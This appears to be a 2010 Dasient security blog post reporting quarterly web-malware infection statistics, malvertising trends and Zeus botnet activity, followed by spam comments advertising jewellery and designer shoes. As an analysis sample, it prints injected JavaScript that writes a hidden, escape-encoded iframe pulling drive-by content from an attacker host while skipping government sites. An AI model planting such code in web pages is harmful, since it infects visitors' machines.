The Q1 2010 Data
In Q1 2010, we estimate that over 720,000 web sites were infected. While this number is significantly higher than our previous estimate of 560,000 infected web sites during Q4 2009, we also improved our methodology based on new telemetry from scanning a larger number of sites on the Internet and that accounts for infected sites that were previously not included.
This number does not only include small to medium sites getting infected, but also larger, high-profile websites (including Fortune 500 companies). Larger sites are desirable targets because of their high volume of traffic. It's much more convenient for an attacker to compromise an existing site than to try and build web traffic to a site they set up from scratch.
The challenge for websites is that there are many different ways for them to get infected. For example, a site that uses a javascript widget that is hosted externally could be at risk for getting compromised with web-based malware, as discussed in a Google report. Or publishers, blogs and other content providers that use third-party ad networks are at risk of having malvertisements introduced to their users on their site. Many sites (large and small) also rely on third-parties to provide packaged software that powers applications on their website. Examples include content management systems, blogging software, web server software, etc. It is often difficult for websites to constantly keep the software running their site up-to-date and patched to the latest version. Keeping server side web applications up-to-date is just as or even more challenging than keeping client side software up-to-date and patched. Even patched applications have vulnerabilities, which emphasizes the need for malware monitoring to mitigate risk due to both known and unknown vulnerabilities in web applications. In fact, in April there was a mass attack on Wordpress where attackers exploited a vulnerability to infect thousands of websites with malware.
As part of our quarterly malware update, we performed a study of a large pool of websites where we identified the risk factors on those sites that may contribute to malware infections. The results were surprising. We found that 97% of Fortune 500 web sites are at a high risk of getting infected with malware due to external partners (such as javascript widget providers, ad networks, and/or packaged software providers). In fact, Fortune 500 web sites have such a high risk because 69% of them use external Javascript to render portions of their sites and 64% of them are running outdated web applications. (We will be publishing a more in-depth study of malware-specific vulnerabilities on websites in the future.)
On a side note: We launched a new service in Q1 called the Dasient Malware Risk Assessment which allows us to run risk profiles on our customers, giving them information on where they are most exposed to web malware. We obtained the above-mentioned results by running our Malware Risk Assessment on a significant number of industry-specific web sites. If any of you are interested in running such an assessment on your web site, please fill in the form and we'll get you started.
Getting back to our statistics: reinfection rates decreased slightly from 42.4% to 40.5%; although, in general, the probability that a web site will get re-infected is still very high. And, of course, higher re-infection rates mean the site has a higher likelihood of suffering from loss of traffic, a decline in revenue, and damage to brand equity.
The average number of processes that infected web sites start on compromised machines is 3.03 (up from 2.8). Although a little higher than last quarter this is still indicative to us that attackers are getting smarter about the way they structure their attacks, opting for a smaller fingerprint on an infected machine, as historically attackers have started up to a dozen or more new processes on machines they compromise.
23.8% of new processes started due to drive-by-downloads had one character filenames such as “a.exe” or “f.exe”.
Attackers prefer to use “.com” domains to host malware. “.com” was the most popular followed by “.cn”. The domain “dnparking.com” was an attacker site used to infect a relatively large number of sites early in the quarter.
ASP, HTML, and PHP pages were the most infected in that order. The combined number of ASP and PHP pages infected shows an increase in dynamic content being infected this quarter which once again emphasizes the growing complexity in web sites and web applications.
Uptick in Anti-Malvertising attacks in Q1
One of the major trends observed is the spike in malvertising attacks since the beginning of 2010.
While content and feature-rich advertisements have been used on the web for some time, attackers are investing more in using them as a channel to distribute drive-by malware downloads.
Viruses and other malware were found to be lurking in ads on high-profile sites like The New York Times, Drudge Report.com, TechCrunch and WhitePages.com as well as by big ad delivery platforms such as Yahoo, Fox and Google.
We thought it may be useful to describe how malvertising attacks work, in general. In a typical attack, the hacker signs up to place an ad on a victim ad network (often using a stolen credit card), or compromises the credentials of an existing advertiser on an ad network. If the attacker signs up for a new account with an ad network, the attacker often places a legitimate-looking ad first, and switches it for a malicious ad once the attacker "gains trust" with the ad network. As some ad networks have stricter policies and/or vetting processes around the posting of ads for relatively new advertisers, some attackers simply compromise the login credentials of already existing, legitimate advertisers.
Given that so much of the web is monetized via advertising streams, it is a wonder that malvertising attacks aren't worse than they are, and the malvertising attacks over the past few weeks could be a harbinger of the growing threat to online advertising commerce.
Now that we have discussed high-level trends from the update, let's take a closer look at what the malware does once it is downloaded to a user's PC.
What is the Malware doing?
In many cases, the malware was trying to join a botnet. Botnets are networks of PCs, which have been taken over by malware programs. What the botnet will end up doing depends on what the botnet 'master' wants it to do but usually it will hook processes to capture keystrokes, send email spam etc. Some of the more common mechanisms to conduct drive-by-downloads included taking advantage of Adobe PDF exploits, and encouraging users to click on socially engineered fake AV windows to initiate dangerous downloads. In particular the 'Zeus' botnet has become very widely spread. Netwitness, based in Herndon, VA, released a report highlighting the kind of havoc the malware can wreak. It documents a Zeus botnet that controlled nearly 75,000 computer in more than 2,400 organizations, including some large and reputable ones such as Merck, Juniper Networks and the Hollywood Studio Paramount Pictures. Over four weeks, the botnet was used to steal more than 68,000 log-in credentials, including thousands of Facebook log-ins and Yahoo email log-ins.
Another interesting observation from our research is how attackers interact with government web sites.
Cybercriminals not interested in CyberWar (yet?)
Attackers use automated scripts to query search engines to get lists of vulnerable sites, and then have their scripts automatically infect sites. Their scripts are typically not very discriminating about which sites they attack. Government-run web sites, for instance, are also likely to be attacked by these automated scripts. For example, last month a part of the Environmental Protection Agency's (EPA) web site was infected, and in May the US Treasury had three of its web sites hacked.
It seems, though, that the attackers conducting such attacks are purely in it for the money. One might imagine that inadvertently attacking certain government web sites might provoke a serious (even military) reaction. Hence, while the attackers want to distribute their malware for fun and profit, they want to stay away from starting an all-out cyberwar. Why do we say that? In some of the attacks that we track, we have seen JavaScript code such as the following, which attackers inject:
if (document.location.href.indexOf("gov") >= 0) {
} else {
document.write("<div style="'display:none'">");
document.write(unescape('%3Ciframe%20src%3Dhttp%3A//%6B%6F%74%73%2E%39%39%36%36%2E%6F%72%67:%39%37/%78%6F/%64%6B.html%20width=100%20height=0%3E%3C/iframe%3E'));
document.write("</div>");
}Basically, the code above says that if the web site attacked is a government web site, then DO NOT serve a malware drive-by-download. Otherwise, it happily generates an invisible frame on the page that pulls in malicious content onto the page which initiates a drive-by-download. What is interesting here is that while an attacker's script may automatically inject the code above into any website, the code is careful not to serve malware to visitors, including government employees, as doing so could be interpreted as an act of cyber-war. What is also interesting that the attackers could decide to launch a cyber-war at any time.
Summary
Based on our research, it is evident that the malware epidemic is growing rapidly. With cybercrime techniques getting more sophisticated every day, it is critical to educate businesses on how they can put safe security practices in place for their websites to protect their customers and their revenues. In order to make sure that their businesses are not exposed, web sites can mitigate their risk by monitoring their websites for malware regularly.
If you're a business owner and you'd like to learn more about how Dasient WAM can help protect your websites, head here. If you're a web hosting provider and you'd like to learn about partnership opportunities with Dasient, check out this page. And no matter who you are, please be sure to check out our Twitter feed for all the latest in web-based malware and general security news.
Keep your sites safe!
Your Dasient Team
This comment has been removed by a blog administrator.
ReplyDeletePersonality for sure gets pandora jewellery raised if you wear few accessories by pandora bracelet with your amazing dressing. Watches, jewelry, glasses pandora bracelets sale and several other accessories if worn pandora charm bracelets with the best attitude, bring a high difference in pandora beads bracelets your overall personality. A trendy and nice watch pandora necklace silver always adds quality to your personality. In earlier new pandora beads days there were not several types and styles discount pandora charms of watches available, but now days it becomes cheap pandora sets very difficult to make a selection between the types and discount pandora sets styles of watches while purchasing it either for a formal wear or for a casual wear.
ReplyDeleteAre you always vexed about wearing Herve Leger what kind of dress at a banquet?
ReplyDeleteHerve Leger bandage dress online store eliminates your worries.
Ladies who is beautiful and noble may choose Herve Leger bandage
dress.The dress highlights your perfect feminine body curve.
If you wear this dress, it will send Herve Leger Blog out your inherent glamour.
It is specially designed for you and meets your noble taste.
Wherever you go, you will be the focus. If you haven't a suitable
dress to attend a banquet and want to 2010 new style buy one now, Herve Leger bandage
dress online store is your best choice.
Christian Louboutin is a name that every woman should be crazy about. This French man has made a miracle in the fashion circle. After working for many fashion brands, he started his own brand - Christian Louboutin Boots. It is famous for its high heels, all kinds of materials, refined design and especially the red outsole signature, which makes you shining in the crowd. Once you see the red outsole; you don't even have to find the logo and you know it is christian louboutin heels. You can see its sexy and noble charm in every fashion magazine. Many celebrities are fans of Christian Louboutin Flats , including Victoria Becham, Jennifer Lopez, Jennifer Anistion, Christian louboutin Black Lively, etc. It is said that there is a super fan who has owned more than 6000 pairs of Christian Louboutin Sandals. Christian Louboutin himself never pays the super stars endorsement fees, but they are willing to speak for this hot and fashionable brand. It is never exaggerated to say that the Red Carpet is a show for the red outsole. Every woman will wow for its sexy and stylish design. To own a pair of Christian Louboutin Pumps has been many females' dream. Now, you have the chance to own the dreaming red outsole. We provide you with the latest and most fashionable Christian Louboutin shoes , most importantly, the prices are attractive. Take your time to enjoy yourself here
ReplyDeleteInstead of UGG Boots, Christian Louboutin fur boots are in hot fashion this season. After fur boots restrained themselves for several seasons, fur storm are full-blown in this fall and winter. Such as Channel, Christian shoes D&G and Christian Louboutin shoes and so on, it is easy to find the existence of fur in their products. This year, Christian Louboutin Pumps all the fur products are made in synthetic fur. I think it maybe that these designers are afraid of the strongly condemn of PETA or they have had a high consciousness about protect animals. Christian Louboutin Sandals No matter how these designers consider about this question, the results are a hopeful thing.
ReplyDeleteFrom the ornaments of fox fur on the shoulders to the fur over coat and boots, fur products will give a comfortable enjoyment to people in this cold winter. Christian Louboutin Boots I think no one can stop the contented feeling.
Matching fur over coats and handbags are still the popular style. Christian Louboutin Flats The great design of many latest style of over coats and boots make the person seems like come from a world of ice and snow of Arctic pole. christian louboutin heels Especially these fur boots are so soft and smooth that it seems that the boots are polar bear’s fur. When you see the latest style of Christian Louboutin Boots, I think you can not help to scream out. christian louboutin specials The beautiful fur matched with the charming splash of red under the boots, how an excellent scene it is!
Maybe you will be worried about that the too warm fur will make people feel hot-headed. christian louboutin black There is no problem about this item. You can choose a small area of fur clothes and matched with light and thin lace chiffon or a simple sweater and skirt.christian louboutin red The taste of mixed dress up is very high at any time. When you wear a pair of Christian Louboutin fur boots in the winter
Fashion is beautiful, it is popular, personality, is to lead the elements.
ReplyDeleteBelieve that modern nobody Herve Leger Clothing will miss, so fashionable and not wrong, but we need to create a unique individual glamour, reflect their personality and body, and his unique style, in a herve leger sale word, we should fashion, but we should be more different, suit oneself style is the ultimate fashion and trend ~ ~
Be sure to also look into our The yuletide season ornaments, pandora bracelet hand carved Santa claus dolls, pandora charm and various seasonal treats. The Euro Store is consistently working to provide you with other very good imported solutions from throughout the world, pandora bead like your recent gold jewelry and even silver jewellery collection.Ruby pandora ring jewelry has long not to mention colorful background. pandora necklaces It has influenced artisans and jewelers for centuries to create fabulous and astonishing works of art. Ruby jewelry happens to be discovered out of as far back as the actual Paleolithic Era, silver pandora charms together with was among the initial traded business oriented goods.Designer Jewelry sparkling with by a lot of and has a long romantic back ground.
ReplyDelete